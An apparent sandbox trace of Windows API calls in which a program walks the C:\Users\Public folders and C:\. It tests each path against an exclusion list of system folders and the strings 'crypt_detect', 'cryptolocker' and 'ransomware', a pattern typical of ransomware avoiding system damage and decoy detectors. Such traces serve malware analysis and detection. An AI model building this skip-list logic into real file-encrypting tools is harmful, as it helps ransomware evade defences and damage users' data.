[0077.221] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0077.221] FileTimeToSystemTime (in: lpFileTime=0x552f454, lpSystemTime=0x552f418 | out: lpSystemTime=0x552f418) returned 1 [0077.221] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f418, lpLocalTime=0x552f428 | out: lpLocalTime=0x552f428) returned 1 [0077.222] FileTimeToSystemTime (in: lpFileTime=0x552f45c, lpSystemTime=0x552f3e0 | out: lpSystemTime=0x552f3e0) returned 1 [0077.222] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f3e0, lpLocalTime=0x552f3d0 | out: lpLocalTime=0x552f3d0) returned 1 [0077.222] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="RecordedTV.library-ms", cAlternateFileName="RECORD~1.LIB")) returned 0 [0077.222] FindClose (in: hFindFile=0xec25b0 | out: hFindFile=0xec25b0) returned 1 [0077.222] GetProcessHeap () returned 0xe30000 [0077.222] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.222] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0077.222] StrCmpW (psz1="Music", psz2=".") returned 1 [0077.222] StrCmpW (psz1="Music", psz2="..") returned 1 [0077.222] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.222] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.222] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Music", cchMax=1056 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.222] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\boot\\") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\programdata\\") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\drivers\\") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\wsus\\") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="crypt_detect") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="cryptolocker") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="ransomware") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.223] StrStrIW (lpFirst="C:\\Users\\Public\\Music", lpSrch="C:\\Program Files") returned 0x0 [0077.223] GetProcessHeap () returned 0xe30000 [0077.223] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ac) returned 0xed41f8 [0077.223] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Music", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0077.223] StrNCatW (in: psz1="C:\\Users\\Public\\Music", psz2="\\*", cchMax=1068 | out: psz1="C:\\Users\\Public\\Music\\*") returned="C:\\Users\\Public\\Music\\*" [0077.223] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21f0 [0077.223] StrCmpW (psz1=".", psz2=".") returned 0 [0077.223] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466d9b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.223] StrCmpW (psz1="..", psz2=".") returned 1 [0077.223] StrCmpW (psz1="..", psz2="..") returned 0 [0077.223] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.224] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.224] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.224] FindNextFileW (in: hFindFile=0xec21f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0077.224] FindClose (in: hFindFile=0xec21f0 | out: hFindFile=0xec21f0) returned 1 [0077.224] GetProcessHeap () returned 0xe30000 [0077.224] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.224] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0077.224] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0077.224] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0077.224] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.224] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.224] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0077.224] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="crypt_detect") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="cryptolocker") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="ransomware") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.225] StrStrIW (lpFirst="C:\\Users\\Public\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0077.225] GetProcessHeap () returned 0xe30000 [0077.225] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed41f8 [0077.225] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0077.225] StrNCatW (in: psz1="C:\\Users\\Public\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\Public\\Pictures\\*") returned="C:\\Users\\Public\\Pictures\\*" [0077.225] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2630 [0077.225] StrCmpW (psz1=".", psz2=".") returned 0 [0077.225] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466e1ef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.225] StrCmpW (psz1="..", psz2=".") returned 1 [0077.225] StrCmpW (psz1="..", psz2="..") returned 0 [0077.225] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.226] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.226] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.226] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0077.226] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0077.226] GetProcessHeap () returned 0xe30000 [0077.226] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.226] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0077.226] StrCmpW (psz1="Videos", psz2=".") returned 1 [0077.226] StrCmpW (psz1="Videos", psz2="..") returned 1 [0077.226] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\Public", cchMax=1056 | out: psz1="C:\\Users\\Public") returned="C:\\Users\\Public" [0077.226] StrNCatW (in: psz1="C:\\Users\\Public", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0077.226] StrNCatW (in: psz1="C:\\Users\\Public\\", psz2="Videos", cchMax=1056 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system32\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\system\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\local\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\boot\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\perflogs\\") returned 0x0 [0077.226] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\programdata\\") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\drivers\\") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\wsus\\") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="crypt_detect") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="cryptolocker") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="ransomware") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\WINDOWS") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.227] StrStrIW (lpFirst="C:\\Users\\Public\\Videos", lpSrch="C:\\Program Files") returned 0x0 [0077.227] GetProcessHeap () returned 0xe30000 [0077.227] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xed41f8 [0077.227] StrCpyNW (in: psz1=0xed41f8, psz2="C:\\Users\\Public\\Videos", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos") returned="C:\\Users\\Public\\Videos" [0077.227] StrNCatW (in: psz1="C:\\Users\\Public\\Videos", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Public\\Videos\\*") returned="C:\\Users\\Public\\Videos\\*" [0077.227] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0077.227] StrCmpW (psz1=".", psz2=".") returned 0 [0077.227] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.227] StrCmpW (psz1="..", psz2=".") returned 1 [0077.227] StrCmpW (psz1="..", psz2="..") returned 0 [0077.227] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.227] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0077.228] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0077.228] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1aa2f0c2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5fdc52c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5fdc52c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0077.228] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0077.228] GetProcessHeap () returned 0xe30000 [0077.228] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed41f8 | out: hHeap=0xe30000) returned 1 [0077.228] FindNextFileW (in: hFindFile=0xec2170, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd466eabf, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0077.228] FindClose (in: hFindFile=0xec2170 | out: hFindFile=0xec2170) returned 1 [0077.228] GetProcessHeap () returned 0xe30000 [0077.228] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7e68 | out: hHeap=0xe30000) returned 1 [0077.228] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0077.228] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0077.228] GetProcessHeap () returned 0xe30000 [0077.228] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0077.228] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0077.228] StrCmpW (psz1="Windows", psz2=".") returned 1 [0077.228] StrCmpW (psz1="Windows", psz2="..") returned 1 [0077.228] StrCpyNW (in: psz1=0xec59c8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0077.228] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0077.228] StrNCatW (in: psz1="C:\\", psz2="Windows", cchMax=1030 | out: psz1="C:\\Windows") returned="C:\\Windows" [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system32\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\system\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\local\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\boot\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\perflogs\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\programdata\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\drivers\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\wsus\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="crypt_detect") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="cryptolocker") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="ransomware") returned 0x0 [0077.229] StrStrIW (lpFirst="C:\\Windows", lpSrch="C:\\WINDOWS") returned="C:\\Windows" [0077.229] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x552fc58 | out: lpFindFileData=0x552fc58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea34fa37, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xccdc86a8, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xccdc86a8, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows10Upgrade", cAlternateFileName="WINDOW~1")) returned 1 [0077.229] StrCmpW (psz1="Windows10Upgrade", psz2=".") returned 1 